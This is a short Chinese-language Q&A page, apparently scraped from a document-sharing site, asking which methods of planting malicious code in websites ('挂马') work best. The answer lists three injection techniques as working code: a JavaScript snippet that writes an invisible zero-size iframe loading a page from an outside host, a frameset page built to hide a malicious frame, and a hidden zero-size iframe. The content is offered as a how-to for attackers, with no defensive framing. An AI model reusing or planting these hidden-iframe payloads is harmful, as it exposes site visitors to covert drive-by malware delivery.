完整的橙皮干:请问挂马的方法有哪些.哪各效果最好???

来源:百度文库 编辑:中科新闻网 时间:2024/05/12 12:33:43
如题...

1.js框架
document.write('<IFRAME marginWidth=0 marginHeight=0 src="http://my.5e163.com/go.htm" frameBorder=0 width=0 scrolling=no height=0 topmargin="0" leftmargin="0"></IFRAME>');
2.假网站框架

<html>
<head>
<meta name="GENERATOR" content="Microsoft FrontPage 4.0">
<meta name="rogId" content="FrontPage.Editor.Document">
<meta HTTP-EQUIV="Content-Type" CONTENT="text/html; charset=gb2312">
<title>死亡守护来挂马</title>
</head>
<frameset framespacing="0" border="0" frameborder="0" rows="*,1">
<frame name="main" src="http://xxxxxxxx">
<frame name="footer" scrolling="no" noresize target="main" src="http://xxxxxxxx">
<noframes>
<body>

<p></p>

</body>
</noframes>
</frameset>

</html>
3.隐藏框架
<iframe src="xx.htm" width="0" height="0" scrolling="no" frameborder="0"></iframe>